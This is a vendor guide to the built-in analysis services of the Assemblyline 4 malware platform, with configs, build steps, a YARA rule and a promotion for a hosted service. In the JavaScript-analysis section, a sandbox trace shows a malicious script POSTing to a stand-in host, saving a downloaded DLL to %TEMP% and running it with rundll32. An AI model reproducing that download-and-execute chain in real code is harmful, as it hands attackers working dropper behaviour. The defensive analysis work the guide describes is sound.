Assemblyline 4 is a popular open-source private malware repository. Arguably the most powerful feature of Assemblyline 4 is the capability to chain many malware analysis services together for comprehensive and highly customisable artifact triage and analysis.
Each Assemblyline service performs a specific function (similar to the “microservices” pattern often used in software architecture). These services can be chained together to process files, extract relevant information, and evaluate potential threats, including it running many times over to deobfuscate multiple layers of obfuscation. This allows us to get deep insight on binaries, documents, and other file artefacts while keeping the samples local to our AssemblyLine instance and using the best-of-breed analysis tools that help us understand it best. It also allows us to score each file to assess if it’s malicious, suspicious, or benign.
In this guide, we’ll dive into Assemblyline’s most useful managed (built-in) services you can incorporate into your analysis workflows.
Organisations using AssemblyLine 4 often fall into one or more of these categories:
If you’re considering Assemblyline for your organisation, check out our hosted Assemblyline 4 service, MalwareZoo. MalwareZoo gives you access to powerful and private malware analysis and storage capabilities (including all the built-in services featured in this guide) without the operations and infrastructure pain.
Utilise common Windows API calls to construct a representation called an ApiVector, used to analyse and classify Windows binaries.
ApiVector can be especially useful when comparing incoming data to a collection of ApiVectors. These vectors can be sourced from Malpedia, and the service can use them to regularly pull updates for analysis. Users can also generate their own ApiVectors, typically as a CSV file.
ApiVector offers parameters for matching ApiVectors, including minimum confidence and minimum Jaccard score, which determine the level of matching and reporting for detected malware families.
Service configuration options available for the APIVector service:
# Parameters for matching apivector
# minimum confidence in the apivector match to do anything with it
"min_confidence": 50,
# min jaccard score to report as implant family
# from https://journal.cecyf.fr/ojs/index.php/cybin/article/view/2 , you can set this depending on your
# tolerance for false positives.
# Even if set very high, FPs are still possible for samples that share a lot of statically linked code
# * 0.18 leads to a TPR/FPR of 90.18% and 9.45%
# * 0.22 leads to a TPR/FPR of 89.10% and 4.74% (closest distance to the (0,1) point)
# * 0.32 leads to a TPR/FPR of 86.55% and 0.99%
# * 0.55 leads to a TPR/FPR of 80.72% and 0.09%
"min_jaccard": 0.40
The CAPA Service is essentially a wrapper around the core functionalities of mandiant/capa, offering streamlined access to its capabilities. Mandiant/capa detects capabilities in executable files. For example, it might suggest that a given file is a backdoor, is capable of installing services, or relies on HTTP to communicate.
For submission parameters and configuration, users can specify the renderer, which dictates the output format. Currently, there are three renderers available: "simple," "default," and "verbose," each offering varying levels of information presentation. The "default" renderer mirrors CAPA’s default output, showcasing information in three tables: ATT&CK, MBC, and other capabilities.
ViperMonkey emulates VBA code execution, allowing analysts to understand how a potentially malicious macro behaves without executing it in a live environment. Its primary purpose is to analyse and deobfuscate malicious VBA macros found in Microsoft Office files such as Word, Excel and PowerPoint documents. The service also tracks intermediate IOCs generated during macro execution, including dropped files and injected shellcode bytes.
APKaye helps analysts to uncover insights about Android applications. It decompiles and inspects Android APKs, providing information on network indicators and details extracted from the APK manifest file. It combines three tools under the hood to achieve this:
A Python script to deobfuscate a batch script that is obfuscated with string substitution and escape character techniques.
A static script de-obfuscator designed to extract obfuscated Indicators of Compromise (IOCs)
This service scans for ASCII and Unicode strings that may indicate indicators of compromise (IOCs).
It utilises Balbuzard's bbcrack tool for XOR transformation, searching for specific IOCs. It also extracts Unicode, Hex, and ASCII-Hex strings, particularly useful for potential shellcode. Finally, it tags IOC pattern matches.
Overpower de-obfuscates and assesses PowerShell files. It employs modified open-source tools for this purpose, including PSDecode (a PowerShell script used to de-obfuscate encoded PowerShell scripts) and PowerShellProfiler, which de-obfuscates and normalises script content, then profiles it to identify behavioural indicators.
This service uses the LIEF library to analyse executable Linux files and provides metadata about the file. LIEF is a cross-platform library for parsing, modifying and abstracting ELF, PE and MachO formats. It also provides an API to access and potentially modify internal structures.
This service wraps the elfparser library and makes the output easily viewable in the Assemblyline UI.
ELF-based malware targets files using the ELF (Executable and Linkable Format) binary format. ELF is a common format used for executables, object code, and shared libraries in Unix-like operating systems, such as Linux. This service provides static analysis and quick access to information about ELF binaries and insight on whether a given binary is suspicious or malicious.
The ELFPARSER CLI provides detailed output, including the score of analysed files, scoring reasons, and detected capabilities. It can identify network functions, process manipulation functions, environment variable manipulation, shell commands, packed files, hard-coded IPv4 addresses, anti-debug techniques, and dropper functionality.
Compiling ELFPARSER:
docker run -u 0 --rm -v $(path_to_extracted_elfparser_source_code):/tmp/elfparser -it cccs/assemblyline-v4-service-base /bin/bash
apt update
apt install -y cmake libboost-all-dev build-essential
mkdir /tmp/elfparser/build
cd /tmp/elfparser/build
cmake ..
make
A wrapper service around GOVCERT-LU/eml_parser used to extract information from .eml files including attachments (hashes and filenames), address fields, received servers path, email subject, and a list of URLs parsed from the email content. The output can easily be converted to JSON.
Example JSON output from EmlParser:
{
"body": [
{
"content_header": {
"content-language": [
"en-US"
]
},
"hash": "6c9f343bdb040e764843325fc5673b0f43a021bac9064075d285190d6509222d"
}
],
"header": {
"received_src": null,
"from": "john.doe@example.com",
"to": [
"test@example.com"
],
"subject": "Sample EML",
"received_foremail": [
"test@example.com"
],
"date": "2013-04-26T11:15:47+00:00",
"header": {
"content-language": [
"en-US"
],
"received": [
"from localhost\tby mta.example.com (Postfix) with ESMTPS id 6388F684168\tfor <test@example.com>; Fri, 26 Apr 2013 13:15:55 +0200"
],
"to": [
"test@example.com"
],
"subject": [
"Sample EML"
],
"date": [
"Fri, 26 Apr 2013 11:15:47 +0000"
],
"message-id": [
"<F96257F63EAEB94C890EA6CE1437145C013B01FA@example.com>"
],
"from": [
"John Doe <john.doe@example.com>"
]
},
"received_domain": [
"mta.example.com"
],
"received": [
{
"with": "esmtps id 6388f684168",
"for": [
"test@example.com"
],
"by": [
"mta.example.com"
],
"date": "2013-04-26T13:15:55+02:00",
"src": "from localhost by mta.example.com (postfix) with esmtps id 6388f684168 for <test@example.com>; fri, 26 apr 2013 13:15:55 +0200"
}
]
}
}
This service analyses JAR files by extracting, decompiling and analysing all classes for malicious behaviour using the CFR decompiler tool. Potentially malicious files are included in the results for analyst review.
The Suricata Service scans network capture files using signatures and extracts files from the network capture. It uses three rulesets by default:
Analyse Microsoft OLE (Object Linking and Embedding) and XML documents for metadata extraction and network information, while also identifying anomalies. Oletools utilises the Python libraries py-oletools and hachoir to provide a comprehensive assessment of potentially malicious content.
For each analysed file Oletools provides individual macro analysis (including SHA256 hashes and suspicious strings detection), extraction of embedded document streams, identification of malicious Class Identifiers, and detection of suspicious XML/OLE stream features like FrankenStrings IOC Patterns, Adobe Flash content, Base64 and Hex encoded content, and MSO DDE Links.
Decode obfuscated XLM macros (also known as Excel 4.0 macros). A wrapper service for XLMMacroDeobfuscator which uses an internal XLM emulator to interpret the macros without fully executing the code.
The PDFId service wraps PDFId (Version 2.7) and PDFParser (Version 7.4) to extract metadata and objects from PDF files.
PDFId reports the PDF header string, counts of various elements (objects, streams, etc.) and metadata such as modification date, creation date, etc.
PDFParser reports the number of different PDF elements (Comment, XREF, etc.), extracts PDF elements like comments, trailer, startXref, and extracts suspicious elements flagged by PDFId plugins.
A wrapper around the PeePDF library used to report file information, heuristics, and other items of interest about PDFs, including CVE identifiers, embedded files, JavaScript and URL detection. The ultimate goal of PeePDF is to give security researchers all the information and tools they might possibly need when analysing PDF files.
Characterize is a file information extraction service. It divides the file into partitions and calculates visual entropy for each partition as well as utilising hachoir-metadata and exiftool commands to extract metadata information from the file.
Checks the metadata of a submitted file to look for anomalies with a focus on common techniques that spam writers use to lure victims to click on embedded files. This includes checking for things like double file extensions, empty file names, excessive use of whitespace and bi-directional unicode control characters.
This service combines elements from six different open-source projects to comprehensively analyse and score JavaScript malware using signatures. The core components of the service are:
1. Malware Jail, which provides a sandbox for semi-automatic malware analysis, deobfuscation, and payload extraction.
2. Box.js, a sandbox for studying JavaScript malware.
3. JS-X-Ray for static analysis via SAST scanning.
4. Synchrony to deobfuscate JavaScript obfuscated with obfuscator.io.
5. WScript Emulator emulates/traces Windows Script Host functionality.
6. GootLoaderAutoJsDecode for automatic decoding of Gootloader files using static analysis.
Malware Jail example output:
bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 - => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 - => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 - => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json
Extract malware configurations, such as IP addresses, URLs, and domains, by using the ConfigExtractor Python library. Works with multiple extraction frameworks, including MWCP, CAPE with MACO output.
Python usage example for the ConfigExtractor Service:
from configextractor.main import ConfigExtractor
import logging
# Create a logger to track ongoings
logger = logging.getLogger()
logger.handlers = [logging.StreamHandler()]
logger.setLevel('DEBUG')
# Instantiate instance of class with path(s) to extractors
# Attaching a logger will allow some insight into what's going on if parser detection is the issue
cx = ConfigExtractor(["/path/to/extractors/"], logger=logger)
# List all parsers actively detected and loaded into instance
# cx.parsers.keys() lists all the relative module paths to the parsers
# The value of each key is an Extractor object containing details for running the extractor (ie. venv location, YARA rule, etc.)
print([cx.get_details(p)['name'] for p in cx.parsers.values()])
# Run all loaded parsers against sample
results = cx.run_parsers('/path/to/sample')
# Output raw results to stdout, each should be organized by the parsers that generated an output
print(results)
Floss uses FireEye Labs Obfuscated String Solver (FLOSS) to identify obfuscated strings, including stacked strings, in executable and Windows files.
It uses several different modules for string extraction, including static strings (in ASCII and UNICODE), decoded strings, and stacked strings. The output also includes strings matching IOC patterns of interest.
Designate a set of files as safe, preventing them from being scanned by Assemblyline in the future. The safelist can be populated either through predefined safelist sources or by users marking files as safe directly within the Assemblyline UI.
You can set up a safelist using a SQL database (similar to NSRL's format, with FILE and PKG tables) or a CSV file. You can also define trusted distributors using regular expressions to ensure the trustworthiness of your hashes.
Integrates with popular AV products like Kaspersky, Skyhigh, ESET, Bitdefender, WithSecure, and Sophos, supporting both ICAP or HTTP requests. Users can integrate with additional antivirus products by providing details like the product name, IP address, port, update period, and optional file size limit. You can also manage false positives by revising the scores in the Assemblyline interface or by identifying and adjusting any signatures causing issues.
Source: CybercentreCanada/assemblyline-service-antivirus. Managing a false positive in the AntiVirus Service.
Two services in one: YARA and TagCheck. The YARA service runs the YARA application against all file types. It currently supports various external modules such as Dotnet, ELF, Hash, Magic, Math, and PE. The YARA rules adhere to the CCCS standard.
TagCheck is a post-processing service that compares all tags generated by other services to a signature set using YARA signatures. It utilises the same code as the YARA service but populates the YARA externals features with all the tags generated by other services.
By default, the TagCheck service runs a small set of signatures mainly geared toward dynamic analysis results analysis (say that three times fast!), with its signature format following the CCCS standard but with added external features to reference Assemblyline tags inside signatures.
Example TagCheck signature format:
rule UPX_Packer_PE_Section {
meta:
version = "1.0"
description = "Identifies UPX packer by PE section names"
source = "CCCS"
author = "assemblyline_devs@CCCS"
status = "RELEASED"
sharing = "TLP:WHITE"
category = "TECHNIQUE"
technique = "packer:UPX"
mitre_att = "T1045"
condition:
al_file_pe_sections_name matches /UPX[0-9]/
}
Check and optionally submit files/URLs to VirusTotal for analysis (BYO free or paid API key) using the v3 REST API. Because doing so will transfer the file externally to VirusTotal, initiating a request for analysis will prompt the user and warn them that the file and related metadata will leave the Assemblyline system.
Submit files to a CAPEv2 deployment and receive parsed reports (users are responsible for setting up the CAPE nest and victim machines). The service retrieves analysis results for the detonation of a submitted file in a victim, displaying a summarised version of the report in the Assemblyline UI. The full report is also available in the Assemblyline UI as a supplementary file. Files that are unpacked and saved to disk are fed back into Assemblyline.
Fetch the Intezer Analyze report for the SHA256 of a submitted file. Optionally, if the SHA256 is not found on the Intezer Analyze instance, the service will submit the file. Created by x1mus with support from Sorakurai and reynas at NVISO, Intezer is now maintained by the Canadian Centre for Cyber Security.
This service calls the Intezer Analyze API with the hash of the file and returns the results. Prior to making the request, the user will be warned that their file or metadata related to their file will leave the Assemblyline system.
An image analysis service combining Optical Character Recognition (OCR) via Tesseract and optional steganography modules (recommended for academic use only). The OCR process can be configured to look for specific terms, such as terms commonly related to ransomware.
Example term inclusion and exclusion for the PixAxe service:
config:
ocr:
ransomware:
include: ['bad1', 'bad2', ...]
exclude: ['bank account']
A wrapper around the Python pyswf library to extract metadata and perform anomaly detection on 'audiovisual/flash' files (SWF).
Extract metadata, calculated data (torrent type, number of pieces, last piece size, torrent size) and file path, file length and MD5Sum information from torrent files.
Create URI files for URIs extracted by other services based on their score or other specified criteria.
Download seemingly malicious URLs using MAS' Kangooroo utility
Unpack UPX packed executables for further analysis.
Facilitates the submission of PE32 binaries to the unpac.me API and provides the results. UnpacMe is an automated malware unpacking service. Users of this service will need to bring their own UnpacMe API key (Community or Subscription).
Assemblyline is also compatible with a range of community created and maintained services, listed here. However, note that these services are not managed or officially endorsed by the Assemblyline team.
If your organisation is exploring Assemblyline and the available services listed here, take a look at our SaaS Assemblyline 4 product, MalwareZoo. MalwareZoo offers robust malware analysis and storage capabilities in a private environment, including all the built-in services outlined in this guide. Getting AssemblyLine up and running for production purposes takes some work - work Cosive has already done for you!
MalwareZoo is fully installed, maintained, upgraded and secured by our team at Cosive, so your team can focus on what they do best: understanding and defending against malware. We’d love to hear about your malware analysis challenges and how we might be able to help.
Hero photo by Simon Kadula on Unsplash.